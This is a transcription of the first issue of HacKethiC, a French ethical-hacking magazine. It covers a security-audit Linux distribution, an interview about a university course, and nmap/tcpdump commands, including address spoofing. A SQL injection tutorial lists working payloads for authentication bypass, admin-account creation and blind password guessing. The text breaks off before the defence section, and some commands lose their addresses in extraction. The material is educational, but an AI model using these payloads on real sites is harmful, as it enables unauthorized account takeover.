Ethical Hacking for Ladies and Gentlemen. La distribution Linux qui permet d effectuer des audits de sécurité

Dimension: px
Commencer à balayer dès la page:

Download "Ethical Hacking for Ladies and Gentlemen. La distribution Linux qui permet d effectuer des audits de sécurité"

Transcription

1 HacKethiC Ethical Hacking for Ladies and Gentlemen N 1 Trimestriel Été 2009 NEW 3.50 En exclu pour HacKethiC LASCaR-OS La distribution Linux qui permet d effectuer des audits de sécurité Page 2 Injection SQL sous PHP Détecter les failles et les exploiter pour apprendre à s en protéger Page 8 Première en France la licence pro CDAISI Entretien avec Franck Ebel, le créateur de la première licence universitaire française de Hacking éthique Page 6 Mise en place d'un tunnel VPN grâce à OpenVPN utilisant SSL Page 13 Attaquant, défenseur : mêmes outils Nmap TCPDump Page 7 HPing2 L outil pour tout savoir Page 11 HacKethiC N 1 1

2 LASCaR-OS C0R3Y, FRESH_MEAT, R4IS3_YOUR_G0D, MASTERPRENIUM LASCaR-OS est un projet de distribution Linux live qui fournit une plateforme permettant d'effectuer des audits de sécurité sur des systèmes d'informations basés sur Linux. Présentation de la distribution et des outils. Introduction LASCaR-OS est un projet de plateforme permettant l'automatisation d'audit de sécurité. Les origines du projet sont celles d'un simple constat : pas (ou peu) d'outils existent et permettent aujourd'hui de réaliser des audits de sécurité complet d'un système d'informations. En terme de sécurité, les besoins ne cessent de croitre et la prise de conscience, notamment des entreprises rend nécessaire de connaître les forces et faiblesses de son Système d' Informations. L'intérêt de LASCaR est de fournir une interface unifiée, simple d'utilisation dans laquelle on retrouve tous les outils nécessaire à la réalisation de d'audit de sécurité. LA DISTRIBUTION Système Kernel et patchs LASCaR comporte un kernel (2.6.27) fait maison, comportant un très grand nombre de drivers pour l'ensemble du matériel existant. Ce kernel supporte bon nombre de drivers wifi patchés afin de supporter l'injection, afin de tester par exemple la sécurité d'un réseau wifi. InitRD Conjointement au kernel, l initrd a été tweaké, afin de pouvoir gérer convenablement des options nécessaires à LASCaR, telles que le réglage de la langue, ou encore l'ajout et modification de scripts permettant de différencier correctement si LASCaR boote en PXE ou si LASCaR boote sur un support amovible. Un script permet à l utilisateur de saisir sa langue et règle ainsi l'ensemble de l'environnement de LASCaR SquashFS LASCaR étant un système live, l'ensemble des fichiers de la distribution ne sont pas présents directement sur le média de démarrage. Ces fichiers de distribution se trouvent dans des fichiers compressés appelés squashfs. Ces squashfs sont montées automatiquement au démarrage et les fichiers qu'elles contiennent sont indexés (grâce à des liens symboliques). La squashfs principale (image.squashfs) est montée en ReadWrite, alors que, par exemple, la squashfs usr.squashfs qui contient bon nombre d'applications installées et autres fichiers s'y rapportant, est montée en ReadOnly. Une fois LASCaR démarré par un des deux moyens cités préalablement, on peut activer le système de boot par PXE de LASCaR, qui va créer les fichiers de configuration nécessaires, lancer les daemons DHCP, TFTP et NFS, permettant au système qui démarre d'obtenir une IP, de récupérer le chargeur d'amorçage (ici PXELinux), de récupérer les fichiers de kernel, initrd, et les squashfs. Environnement graphique CRÉATION D UNE CLÉF USB BOOTABLE LASCaR se voulant d'être accessible pour n'importe quel utilisateur, il a été nécessaire de mettre en place un environnement graphique grâce à un serveur X. Au démarrage de LASCaR, des scripts sont lancés, pour régler le fichier de configuration afin que le serveur X fonctionne correctement. Il peut cependant arriver que certaines configurations au matériel exotique empêche le fonctionnement correct du serveur X. Le pari était d'avoir à la fois un environnement léger, sans surplus, ergonomique, moderne, économe en ressources et prenant le moins de place possible. Selon ces critères, nous avons retenu un certain nombre d'environnements semblant convenir, nous les avons ensuite passés au banc de test. Après cette phase de test, nous avons décidé de choisir OpenBox comme base. OpenBox est un environnement plutôt nu, pas d'applications, pas d'icônes, il a donc été nécessaire de l'agrémenter, notamment d'un gestionnaire de fichiers.pcmanfm fait un excellent gestionnaire de fichier, il a aussi la prétention de pouvoir gérer certaines fonctionnalités telles que la gestion des icônes de bureau. Bien que l'utilisation de cette fonctionnalité ne soit pas conseillée par ses développeurs pour l'instant, elle est pourtant stable. Les retours des utilisateurs semble montrer que PCManFM fonctionne mieux que idesk dans le domaine. Note SquashFS est un système de fichiers compressé (gzip) en lecture seule sous Linux. Système de boot Il est possible de télécharger LASCaR sous forme d iso bootable sur son site, et de créer si besoin est, une clé USB bootable à partir du système live une fois celui-ci démarré. HacKethiC N 1 2 ENVIRONNEMENT GRAPHIQUE AVEC PCMANFM

3 LES OUTILS Audit système Test de complexité de mots de passes Avec ce module, il est possible de tester la résistance de hash à certaines méthodes de cracking. L'interface permet de choisir un fichier de mots de passe au format UNIX (de la forme utilisateur:hash), mais aussi de générer un hash directement à partir d'un mot de passe entré par l'utilisateur. Il est possible de choisir le nombre de processeurs locaux sur lesquels les calculs doivent être répartis (si l'algorithme le permet) et le niveau d'optimisation (i686, pentium3, athlon,...). Il est également possible (toujours en fonction de l'algorithme) de distribuer les calculs de bruteforce sur plusieurs machines. Une fois cette phase remplie, l'utilisateur peut choisir entre 3 méthodes : bruteforce, bruteforce par dictionnaire et table rainbow. Le bruteforce avec ou sans dictionnaire est effectué en fond avec JohnTheRipper, la distribution du bruteforce est faite avec MPI, le cracking par table rainbow est fait avec rcracki. PRINCIPE DE GÉNÉRATION DU TRACEROUTE 3D Bien sûr, les doublons d'ip sont supprimées de la liste curseur, et si une IP est déjà représentée, on la supprime également de la liste. Le calcul de coordonnées est fait en fonction des IP à représenter (sous forme de boules : vert pour le départ, rouge pour l'arrivée). Généralement ces coordonnées sont incrémentées à chaque itération. Le modèle peut ensuite subir diverses rotations (utilisation des cameras de soya3d) pour être visualiser sous un autre angle. TRACEROUTE 3D Note TEST DE COMPLEXITÉ DE MOTS DE PASSES Ces logiciels n'étant pas prévus pour être interfacés, le génération d'un rapport est plus que problématique, nous travaillons actuellement à la résolution de ces problèmes. Audit réseau Traceroute 3D Il s'agit d'une fonctionnalité déjà implémenté dans Scapy, malheureusement la fonctionnalité 3D n'est pas prise en charge sous LASCaR : al'installation de Vpython, nécessaire à cette fonctionnalité, posait problème pour le developpement de LASCaR. L'objectif de cet utilitaire est donc de fournir une fonctionnalité similaire, par le biais de soya3d. La fonctionnalité traceroute de Scapy permet entre-autre de réaliser un traceroute en 2D, mais également de sauvegarder un fichier de log. C'est en parsant ce fichier que l'on va récupérer les informations nécessaires à la construction du modèle en 3D. On récupère les adresses IP de destinations et les ports que l'on stock dans une structure de données particulières : un dictionnaire de dictionnaires de listes. Via une liste curseur, cette structure est ensuite parcourue pour obtenir les adresses par niveau et ainsi les représenter. GUI NMAP L'interface est disponible via la plateforme d'audit. Elle a été conçu de façon à être ergonomique et esthétique mais surtout simple à utiliser. On dispose naturellement de toutes les fonctionnalités d'nmap : scan de ports classique, détection de services, détection d'os, scan furtif. Python propose une librairie qui permet d'interfacer l'environnement graphique gtk avec un programme externe. Ici, nous ajoutons une surcouche à nmap afin d'en faciliter l'utilisation et surtout pour proposer un rapport d'audit complet. Nous avons un menu déroulant qui propose une liste d'options de scan par thème (tels que : «stealth scan, OS dectection...»), nous pouvons ainsi scanner des ports ou services particuliers en choisissant simplement l'entrée correspondante dans la liste. Bien sur, il est possible pour l'utilisateur d'entrer ses propres options ou ses commandes, pour peu qu'il connaisse nmap, il lui est possible d'effectuer le scanne qu'il souhaite. Pour chaque option de scan, un descriptif affiche afin d'informer l'utilisateur des opérations qui vont être effectuées, par exemple, l'option «messenger scan» précise à l'utilisateur qu'il s'agit d'un scan sur les ports 1863 ainsi que la plage 6891 à 6900 correspondant aux ports utilisés par les clients du protocole de messagerie instantanée de micro$oft. Ce qui permet à l'utilisateur non averti de savoir exactement quel scan il est sur le point d'effectuer. GUI NMAP HacKethiC N 1 3

4 Bien sûr l'interface permet la génération de rapports d'audit. Ce rapport, mentionne le descriptif du scan affiché par le GUI et le résultat renvoyé par nmap qui s'affiche dans le champ prévu à cet effet. Nmap et donc l'outil le plus à même d'offrir un service pertinent d'audit de vulnérabilité de services réseau en détectant les ports ouverts. L'interface disponible dans LASCaR, permet à l'utilisateur de générer un rapport clair et complet pour des services définis et avec des options précises. Note Il s'agit de proposer, à des fins d'audit, un outil qui puisse indiquer à l'utilisateur quels sont les ports et/ou services sensibles sur une machine donnée. Nous avons pris le parti d'utiliser nmap. Nmap est un outil de scan de port très puissant, il dispose de nombreuses options. Il ne s'agit pas de réinventer la roue mais de fournir une interface simple permettant d'effectuer des scans de ports de manière intuitive. Dans un premier temps, il nous faut disposer des adresses MAC des machines. Le but étant de déterminer si des ordinateurs quelconques peuvent être démarrés, il est nécessaire de couvrir toute la plage de possibilités. Nous allons donc procéder en deux étapes : D'abord nous déterminons le type de carte réseau existante à partir d'une liste de constructeurs (environ 8000 entrées) puis nous générons les adresses MAC à partir de cette information. Les trois premiers octets de la MAC sont fixés (ils correspondent au constructeur de la carte réseau ). Les derniers octets correspondent aux cartes, et sont générés automatiquement, dans l'ordre de manière à couvrir toute la plage d'adresses disponible par constructeur. Avec les MAC ainsi générées, il faut forger un «Magic Packet» à l'aide du module struct de Python. Sans entrer dans les details, ce module permet de convertir des chaines de caractères formatées en valeurs binaires. Cette méthode permet de disposer du bon encodage pour l'envoi de magic packets. On envoie ensuite ces magic packets par socket en UDP. On teste le réseau en envoyant des paquets Ethernet avant et après l'envoie des magic packets pour déterminer par comparaison si des machines ont été réveillées. WIRESHARK FILTERS Note En matière de sniffing, il existe plusieurs outils puissants et plus ou moins ergonomique, pour LASCaR nous nous sommes arrêté sur Wireshark. C'est un logiciel très puissant permettant de capturer n'importe quel fulx réseau. Cependant, il arrive que pour capturer un trafic particulier ou des paquets précis l'application de filtres soit délicate. Afin de pouvoir effectuer un analyse precise et complete du trafic réseau, une bibliothèque de filtres de sniffing a été intégrée directement dans Wireshark. Chaque filtre se présente sous la forme d'un descriptif simple qui résume l'action et il suffit de sélectionner le descriptif pour appliquer le filtre. Nous disposons de filtres de capture et de filtres d'affichage qui permettent de vérifier le trafic de façon pertinente : on peut vérifier le trafic web (mot de passe, récupération de cookies...) on peut également vérifier si du trafic est généré sur le réseau par la propagation de vers ou de virus tel que Welchia. Audit logiciel TOOLS WOL Tools FILTRES DE CAPTURE Analyse de fichier de log Il s'agit d'un outil permettant d'analyse des logs générés par auditd. Le fichier généré par le daemon auditd est en réalité une liste des appels systèmes effectués par tel ou tel processus (reconnaissable via son PID). L'idée ici est de suivre un principe simple selon lequel presque toutes les attaque par buffer overflow se déroulent en trois étapes : un exploit est exécuté un shell est lancé A terme, en analysant les logs via certaines règles, il est possible de déterminer si une attaque à eu lieu ou non. Au sein d'un système d'informations, certains ordinateurs ou serveurs peuvent être configurés pour être démarrés par le réseau. L'objectif de cet outil est de déterminer si certaines machines peuvent être démarrées à distance à l'insu de l'administrateur. Note Le Wake On Lan est une technique consistant à envoyer à la carte réseau d'un ordinateur des «magic packets». Ces paquets sont constitués de l'adresse MAC de broadcast suivie de seize répétition l'adresse MAC de la carte réseau cible. A réception de ces paquets, la carte réseau demarre la machine. Note Auditd est un démon qui permet de surveiller ce qu'il se passe au niveau du noyau Linux. Une fois activé il se met en écoute de nouvelles règles de surveillance et enregistre dans un fichier de journalisation (/var/log/audit/audit.log) tous les événements correspondants aux règles définies. La première règle est chargée de parcourir le fichier de logs et de répertorier tout les appels systèmes de type fork (c'est à dire les créations de processu) dont le champs AUID (Audit User ID, l'identifiant de l'utilisateur au moment du login) est différent de 0 (root).la seconde règle doit isoler parmis les créations HacKethiC N 1 4

5 de processus précédentes celles qui sont suivis d'un appel système execv. Pour cela on passe à cette règle le PID du processus. La troisième règle est chargée de retrouver les appels système setuid(0) puis le ou les appels execv (chargeant en général un shell dont l'euid est à 0). Le changement par setuid peut être détecté en observant le changement de valeur des champs uid du fichier de log (ce qui évite l'utilisation d'un appel système supplémentaire par le daemon). On se trouve ici à l'étape du chargement du shellcode. Parallèlement, on vérifie que le fichier exploité n'a pas le bit SUID. Si toutes ces conditions sont réunies, il y a de grandes chances pour que le daemon auditd est tracé l'exécution d'un exploit de buffer overflow. Cryptographie/Stéganographie Ces deux outils ont été classés plutôt dans la cathégorie divers car il ne permettent pas d'auditer directement le système. L'outil de stéganographie permet de dissimuler du texte au sein d'une image au format bmp, png ou gif. La variation des valeurs des pixels est infime ce qui complexifie l'analyse de l'image dans le but de retrouver les informations. Les modules Python-Imaging et PIL ont été utilisés pour le traitement d'image (notemment pour récupérer la valeur de composante RVB de chaque pixel). Audit ClamAv L'audit repose à la fois sur l'analyse du fichier de configuration de ClamAv et sur des tests de packing.afin d'utiliser ClamAv dans des conditions réelles, il est nécessaire de copier les deux fichiers de configuration du système hôte, clamd.conf et freshclam.conf (que l'on retrouve dans /mnt/system), dans le /etc de Lascar. Ainsi l'outil pourra utiliser le programme clamscan, installer sur Lascar, de façon locale pour effectuer les tests avec les fichiers de configuration de l'hôte. Une fois la copie effectuée, l'utilisateur peut paramétrer l'outil de façon à audi- Note ClamAv est un antivirus souple, efficace et entièrement paramétrable. Cependant son efficacité est liée à sa configuration et si celle-ci n'est pas fiable la sécurité d'un système peut être compromise. Un outil d'audit a été créé dans l'optique de remédier à ce problème en démontrant de façon simple à un utilisateur que son antivirus présente des lacunes. ter plus ou moins précisément sa configuration : il peut cocher la vérification de la présence de détection heuristique, l'analyse de la fréquence de mise à jour, ou encore la résistance face au programme packés (c'est à dire dont le contenu à été compressé/crypté dans le but de modifier sa signature).l'ensemble de l'analyse est effectuée sur les fichiers de configurations à l'exception des tests de résistance face aux packers. Ces fichiers de configurations sont parsés dans le but de retrouver les informations nécessaires. Ainsi si la fonction détection heuristique est cochée dans l'outil, celui-ci va vérifier si ce type de détection est paramétrée à yes dans clamd.conf. De même pour la fréquence des mises à jour, plus celles-ci seront espacées, moins cela rapportera de points sur le barême. Concerant ce barême, il est établit en fonction du nombre de points à audités (cases cochées par l'utilisateur). Concernant les tests effectués directement sur resistance face aux programmes packés (qu'ils s'agissent de programme elf ou pe, lancés via wine): un programme choisit par l'utilisateur est packé via UPX (pour le format pe) ou un moteur polymorphique modifié (pour l'elf et codé en C). La signature du programme ayant au préalable été ajouté dans la base de ClamAv, le résultat du scan (avec clamscan) est analysé pour en déterminer la fiabilité. Le but de ce test est de déterminer si la configuration de l'antivirus permet de détecter via ses méthodes heuristiques des virus polymorphiques (repose sur l'analyse comportementale et non sur la signature de celui-ci). Une fois l'ensemble des tests choisis effectués, une note (en %) est calculé et représentée graphiquement sur une barre de progression. OUTIL DE STÉGANOGRAPHIE L'outil de cryptographie,contrairement à la stéganographie ne dissimule pas de texte, mais le rend illisible aux yeux d'un utilisateur ne possédant pas la clé. Le module pycrypto à été utilisé ici pour crypter du texte et générer les clés.l'outil permet de crypter un fichier texte selon trois algorithme : RSA, DES, AES. L'intérêt de l'outil est la possibilité de coupler le texte crypter avec l'outil de stéganographie pour une dissimulation supérieure des données. Le cryptage selon AES ou DES est sensiblement le même et seul le nom de la fonction du module de pycrypto change. La subitilité provient du RSA qui nécessite de générer clé privée à partir de la clé publique. L'interface de l'outil se devait de resté simple pour ne pas induire l'utilisateur en erreur. De plus la clé devant être de huit bits au moins pour le DES et seize pour l'aes, Une vérification de la longueur est effectuée sur la clé entrée par l'utilisateur. AUDIT CLAMAV OUTIL DE CRYPTOGRAPHIE HacKethiC N 1 5

6 Autres outils Parser XML Il s'agit de l'outil utilisé pour transformer nos rapports écrits en xml en divers formats. A l'heure actuelle, seul le xhtml est supporté mais le support du pdf sera prochainement inclus. Le parser fonctionne de la manière suivante : le fichier xml est analysé caractère par caractère et les balises ainsi que leur contenu sont stockées dans une liste. La liste est ensuite parcourue et suivant les règles inscrites dans le parser, une hiérarchie par niveaux est créée. Un niveau est en fait un objet de type List qui contient un ou plusieurs champs d'informations (le plus souvent des strings) et éventuellement des objets vers les niveaux supérieurs. Pour finir, il faut parcourir cette arborescence avec des règles spécifiques au format que l'on veux générer. RR0D RR0D est un débugger en mode ring 0. Cette application système se présente sous la forme d'un module kernel et s'insère entre le matériel et le kernel (également appelé ring -1). Il permet d'intercepter tout ce qui passe entre le logiciel et le matériel, et comme il ne dépend pas de l'os, il a ses propres drivers d'entrée sortie, il est par ailleurs nécessaire de disposer d'un contrôleur ps2 ou d'une émulation ps2 dans le BIOS afin de pouvoir utiliser le clavier, car rr0d écrit directement dans le bus ps2. Afin d'appeler le débugger, il est nécessaire de lancer dans les applications l'interruption 0x03. Afin de pouvoir être compilé, rr0d nécessite de connaître certaines informations, notamment l'adresse du framebuffer. Le module est donc compilé au lancement de la distribution avec le parsage des informations du kernel et un passage à sed sur les sources. RASTA RIND ZERO DEBUGGER Conclusion La distribution LASCaR met donc à disposition au sein d'une plateforme des outils qui permettent d'effectuer un audit complet de sécurité d'un système d'informations. La plateforme propose différents modules classés par thème afin de facilité l'utilisation. Une fois les différents tests réalisés, des rapports sont générés afin que l'utilisateur conserve les informations récoltées. Le système remplit donc complètement son objectif qui est de fournir une interface simple et des outils facile à utiliser. La distribution est aujourd'hui à l'état de release Beta 0.6C, de nombreux points restent à améliorer et certains outils sont encore à débugger. Il est possible de se procurer la distribution sur le site internet Il est également possible de devenir beta-testeur. Un système de tickets (trac) à été mis en place afin que nous puissions avoir des retours d'utilisation rapides et puissions corriger les bugs. Note Une première en France : la licence professionnelle CDAISI Une toute nouvelle licence professionnelle vient de naître en France à Maubeuge, antenne universitaire de l'uvhc. Nous avons rencontré le responsable de cette licence. Nous sommes accueillis par un homme, rasé, avec des lunettes et un tee shirt «I'm a social engineering expert because there's no patch for human stupidity». NoBag : Bonjour, vous êtes Ebel Franck et vous êtes responsable de cette licence professionnelle. Elle se nomme CDAISI, pouvez-vous nous expliquer la signification? Franck Ebel : C'est un peu compliqué, le nom initial devait être «ethical hacking» mais l'état d'esprit rétrograde en France, pour pouvoir etre habilité a fait que le nom est devenu CDAISI : Collaborateur pour la défense et l'anti-intrusion des systèmes informatiques. On nous a d'ailleurs au départ traité de pirates a cause du terme ethical hacking N : Pourquoi une première en France? F. E. : C'est surtout l'angle dont on l'aborde qui en fait une première en France. Le slogan est «apprendre l'attaque pour mieux se défendre». Cela explique le contenu de la formation. On apprend les attaques des pirates pour ensuite voir les contre-mesures. N : Vous avez des collaborations? F.E. : Nous sommes partenaires avec l'université d'abertay à Dundee en Ecosse qui a un cursus similaire au notre et le CPEE en belgique. De nombreux intervenants professionnels sont présent et encore plus l'année prochaine : Sysdream, Perein, Reason System, British Telecom, Jeumont electric, AXA assurances, DRASTIC, Acissi N : La première année se termine, un bilan? F.E. : 21 étudiants, 20 diplômés. Un bon taux de réussite donc. Le recrutement pour l'année prochaine est en cours. Nous avons réaménagé le programme en l'affinant par rapport aux retours des professionnels et des étudiants. N: Les étudiants CDAISI ont participés à plusieurs challenge, non? F. E. : oui, ils ont tous participés au challenge de ethical hacking de Maubeuge (http://www.salon-informatique-maubeuge.com) et une équipe a participé à la nuit du hack (http://www.nuitduhack.com). L'année prochaine, notre partenaire écossais organise lui aussi un challenge et nous serons de la partie. N : Je vois aussi que le matériel est à la pointe. F.E. : tous les PC sont neuf et changés tous les trois ans, nous nous équipons en RFID, VoIP, Bluetooth N : Pour avoir des renseignements, s'inscrire, que faire? F. E. : Il faut me contacter ou nous téléphoner ( ) ou aller sur le site de la fac (http://www.univ-valenciennes.fr). Site officiel du projet et téléchargement : contact mail : irc : #lascar on freenode HacKethiC N 1 6

7 Les outils de sécurité et surveillance réseau PAR PERDEREAU JÉRÉMIE Qu'on soit attaquant ou défenseur, les outils utilisés sont les mêmes. Car quand on souhaite protéger un système, il faut avant tout savoir l'attaquer. Et tout intrus voudra d'abord se protéger lui-même... Nmap Nmap est l'outil par excellence de l'intrus. Nmap est un scanner de ports créé par Fyodor. Comme son nom l'indique, il est fait pour détecter les ports ouverts, permet aussi d'identifier les services qui tournent derrière et obtenir des informations sur le système d'exploitation d'un ordinateur distant. Il est capable de scan sur une plage d'adresse ip. En gros si vous avez un serveur qui tourne sur la machine distante, alors il le trouvera. Il est disponible sous Windows, Mac OS X, Linux, BSD et Solaris. TCPDump Tcpdump est un "sniffeur de trames réseau" en ligne de commande, c'est à dire qu'il est capable de récupérer toutes les trames réseaux qui passent par une carte réseau et pas forcement en provenance ou en destination de votre carte réseau. Cela permet par exemple de récupérer un mot de passe réseau, ou une page HTML contenant des informations sensibles. Il est disponible sur la plupart des systèmes (Linux, Mac, Windows ). Pour les environnements unix il faut être root pour pouvoir l'utiliser. Voici quelques options : Voir les ports TCP ouverts, utilisation de messages SYN, il n'y a pas de création de log sur la machine cible : >>sudo nmap -ss Voir tous les ports UDP ouverts sur une machine : >>sudo nmap -su Pour scanner une plage d adresses. Par exemple à : >>sudo nmap , Il est possible que nmap n'arrive pas à connaître la version, dans ce cas utiliser la commande. >>sudo nmap -O osscan-guess Scanner un port : >>nmap -p Scanner une plage de ports : >>nmap -p Désactiver la résolution DNS inverse des hôtes, augmente la rapidité : >>nmap -n Usurper l adresse ip source. Ici on scanne , par l interface réseau eth0, en se faisant passer pour depuis le port 80 : >>nmap -S g 80 -e eth0 -P Usurper l adresse MAC : >>nmap spoof-mac 01:02:03:04:05: >>nmap spoof-mac Cisco Choisir un fichier de sortie pour y écrire les résultats du scan : >>nmap -on resultat >>nmap -ox resultat.xml Trace les paquets et les données envoyés et reçus. Pratique pour vérifier qu une usurpation fonctionne : >>nmap packet-trace -S eth HacKethiC N 1 7 Les options importantes : Le mode verbeux, avec différents degrés : >>sudo tcpdump -v >>sudo tcpdump -vv >>sudo tcpdump -vvv Afficher le contenu de chaque paquet capturé : >>sudo tcpdump -A Connaître les interfaces disponibles pour l'écoute : >>sudo tcpdump -D Spécifier une interface, ici eth0 : >>sudo tcpdump -i eth0 Seulement les paquets pour adresse source ou destination >>sudo tcpdump host Seulement les paquets pour adresse destination : >>sudo tcpdump dst Seulement les paquets pour adresse source : >>sudo tcpdump src Spécifier un port, ici le port 80 : >>sudo tcpdump port 80 Spécifier un protocole, ici TCP : >>sudo tcpdump proto TCP (cf. le man pour la liste des protocoles) Additionner plusieurs filtres avec le «and» : >>sudo tcpdump dst and port 80 ici capture des paquets qui vont vers par le port 80. Mettre la capture dans un fichier : >>sudo tcpdump -w capture.dump Nous pourrons l'analyser après avec tcpdump par la commande qui suit ou encore l'analyser avec un logiciel tel que wireshark (Ethereal) : >>sudo tcpdump -r capture.dump

8 Injection SQL sous PHP / MySQL NICOLAS CROCFER Les attaques par injections SQL représentent aujourd hui une part importante dans la sécurité des sites web. En effet beaucoup de sites communiquent directement avec une base de données, que ce soit pour aller rechercher des informations sur leurs membres, stocker du contenu, etc. Introduction L article qui suit va tenter d expliquer les bases des injections SQL en utilisant le langage PHP et une base de données MySQL. Nous verrons tout d abord le principe des injections SQL, puis nous apprendrons à détecter les failles pour ensuite les exploiter, et nous verrons pour finir les moyens de protection possibles. EXPLICATIONS DE LA FAILLE Pour comprendre comment exploiter une injection SQL il faut tout d abord comprendre comment une requête SQL se fait. Examinons la requête suivante : $sql = SELECT users FROM table WHERE pseudo LIKE %$pseudo% ORDER BY NAME ; Ici nous recherchons tous les membres dont le pseudo contiendra la valeur de $pseudo, le résultat étant trié par nom. Par exemple en entrant le pseudo linux, nous pourrions avoir les résultats aalinuxbb, linuxtuto, vivelinux, etc. Un exemple d injection SQL serait ici d entrer comme pseudo la valeur % ORDER BY uid # La requête deviendrait : $sql = SELECT users FROM table WHERE pseudo LIKE % ORDER BY uid #% ORDER BY NAME ; Ici tout ce qui est à la droite du signe # sera ignoré par le langage SQL. Nous obtenons donc une liste non pas triée par nom mais triée par uid, ce qui n était pas prévu par le script! Nous avons donc bel et bien fait une attaque par injection SQL. Bon, je vous l accorde, cet exemple n est pas très utile mais il présente au moins l avantage d expliquer simplement le principe d une injection. Passons maintenant à la vitesse supérieure DÉTECTION D UNE FAILLE Comme vous allez le constater la détection du faille de ce type est assez facile à mettre en œuvre. Pour cela il suffit simplement d entrer dans un formulaire la valeur c est daisy (par exemple ^^) puis de constater si une erreur apparaît. En reprenant la requête SQL que nous avons utilisé tout à l heure, cela donnerait : $sql = SELECT users FROM table WHERE pseudo LIKE %c est daisy% ORDER BY NAME ; Bibliographie (outils de sécurité) Nmap - Wikipedia, the free encyclopedia : Nmap Wikipédia : Ghosts In The Stack Nmap : man nmap : tcpdump - Wikipedia, the free encyclopedia : tcpdump Wikipédia : TCPDUMP/LIBPCAP public repository : man tcpdump : Comme vous le constater tout ce qui est en rouge après le c ne sera pas pris en compte par la requête, et celle-ci renverra un message d erreur du genre : mysql_fetch_array(): supplied argument is not a valid MySQL Bien sûr si aucune faille n est présente, à savoir si le développeur a bien protégé ses variables, aucune erreur n apparaitra, la requête étant changée par exemple en : $sql = SELECT users FROM table WHERE pseudo LIKE %c\ est daisy% ORDER BY NAME ; Mais nous reviendrons sur ces moyens de protection dans la partie Protection. EXPLOITATION D UNE FAILLE Une fois la faille détectée, il faut pouvoir l exploiter Cette partie va tenter d expliquer les méthodes afin d obtenir des informations sur le serveur. 1 - La commande INSERT Nous allons pour commencer tenter de créer un compte avec les droits administrateurs via un formulaire d enregistrement qui contiendrait une faille. Prenons la table suivante : CREATE TABLE users ( uid smallint(6) NOT NULL auto_increment,login varchar(25),password varchar(25),statut tinyint,primary KEY (id)) Cette table très simple contiendra au final l id du membre, son login, son password et une chose bien plus importante : son statut (par exemple 1- administrateur ; 2- modérateur ; 3- membre normal). Examinons également la requête qui ajoute un membre : INSERT INTO users (login,password,statut) VALUES ('$login','$password','3') Lors de la création, le champ uid s incrémentera tout seul, le champ login prendra la valeur de $login, de même pour password et $password, et le champ statut prendra par défaut la valeur 3, ce qui est normal car dans la plupart des sites lorsqu un membre est créé il n est au départ qu un utilisateur de base, c est après qu on décide de le passer modérateur ou même administrateur. Bref revenons à nos injections et après avoir détecté si une faille existe, exploitons-là! Ici vous comprendrez que le but de l injection sera de se créer un compte administrateur. Pour cela entrez les valeurs toto dans le champ $login ainsi que titi','1')# dans le champ $password. La requête devient alors : INSERT INTO users (login,password,statut) VALUES ('toto','titi', '1')#','3') Ici tout ce qui sera après le # ne sera pas pris en compte par la requête. Vous l aurez donc compris nous venons de créer l utilisateur toto, avec le mot de passe titi et surtout avec le statut d administrateur du site! Bon, d accord me direz vous, mais si jamais ce n est pas la requête lors de l inscription qui indique le statut de l utilisateur, mais que c est dans la base ellemême que cela a lieu. Par exemple au lieu d avoir : statut tinyint,, nous aurions : userlevel tinyint default '3', HacKethiC N 1 8

9 , avec la requête : INSERT INTO users SET login='$login', password='$password' Dans ce cas effectivement le statut par défaut lors de chaque inscription serait le 3, et c est plus tard que l administrateur modifierait ce statut. Pour contrer cette «protection», il suffit de modifier un peu notre injection pour avoir titi', statut='1 puis de l injecter dans l un des champs. Ce qui donnerait par exemple la requête suivante : INSERT INTO users SET login='toto', password='titi', statut='1' Nous venons là aussi de créer un membre avec les droits de l administrateur. 2 - La commande SELECT Bon il ne faut pas se mentir, ce type de faille est tout de même assez rare, n empêche que ça peut quand même arriver. Maintenant prenons un cas différent. Nous avons vérifié au niveau du formulaire d enregistrement si une faille existait malheureusement il n y en a aucune Bon eh bien si on ne peut pas se créer de compte avec les droits d admin, on va aller rechercher le mot de passe de l administrateur :D a - Se connecter à la place de l admin Restons sur notre exemple concernant la table users. Pour rappel la voici : CREATE TABLE users ( uid smallint(6) NOT NULL auto_increment, login varchar(25), password varchar(25), statut tinyint, PRIMARY KEY (id) ) Cette fois-ci nous allons attaquer le formulaire d authentification, et non plus d enregistrement. La requête pour l authentification est la suivante : SELECT uid FROM users WHERE login='$login' AND password='$pass' Pour exploiter la faille il nous suffit d entrer comme login ainsi que comme password la valeur a' OR 'a' = 'a Nous aurions donc : SELECT uid FROM users WHERE login=' a' OR 'a' = 'a' AND password='a' OR 'a' = 'a' Notre requête va bien entendu fonctionnée étant donné que 'a' = 'a' est toujours vrai. La requête sélectionnera donc l uid du premier utilisateur, et dans bien des cas ce premier utilisateur est tout bonnement l administrateur du site. Nous serons donc connectés à sa place. L injection que nous avons placé n est qu un exemple parmi tant d autres, nous aurions tout aussi bien pu injecter la valeur a' OR 'a' = 'a'# Ce qui aurait donné : SELECT uid FROM users WHERE login='a' OR 'a' = 'a'# AND password='' Et vous le savez désormais, tout ce qui se situe après le # ne sera pas pris en compte pour la requête. Maintenant supposons que vous souhaitiez vous connecter sur le compte d un utilisateur en particulier. Il suffit d injecter nom_de_l_utilisateur'# dans le champ $login. Ce qui donnerait par exemple : SELECT uid FROM users WHERE login='monsieurledirecteur'# AND password='' La suite du script se ferait avec l uid de l utilisateur souhaité, et vous seriez donc connecté à sa place. b - Deviner le mot de passe de l admin Dans le cas précédent nous n avons fait que nous connecter à la place de l administrateur, mais nous ne connaissons pas son mot de passe. Les plus malins nous diront qu il n y a plus qu à le changer une fois connecté, et ce n est pas faux d ailleurs, cependant ce n est pas très discret : le véritable administrateur se rendra bien compte lors de sa prochaine tentative de connexion que son password ne marche plus. Une manière plus discrète d obtenir des accès root sur un site consiste donc à «deviner» le mot de passe de l admin. Toujours avec la table users précédemment utilisée et la même requête de connexion, entrons la valeur admin' AND password LIKE 'a%'# dans le champ $login, Nous obtenons alors la requête suivante : SELECT uid FROM membres WHERE login='admin' AND password LIKE 'a%'#' AND password='' Vous l aurez compris si le password de l utilisateur concerné commence par un a vous serez connecté, sinon vous ne le serez pas. Par la suite il faudra essayer avec b%, c% etc jusqu à trouver la bonne lettre, puis recommencer avec Xa%, Xb%, etc. Bien sûr il se peut que vous ayez fini par trouver le mot de passe mais que vous continuiez tout de même à essayer de le trouver. Pour éviter cela il suffit de trouver la taille du password avec la commande SQL : LENGTH. Par exemple en injectant admin' AND LENGHT(password) = 5'# Nous obtenons la requête : SELECT uid FROM membres WHERE login='admin' AND LENGTH(password)=5'#' AND password='' Si le mot de passe est égal à 5 vous serez connecté, sinon il faudra essayer une 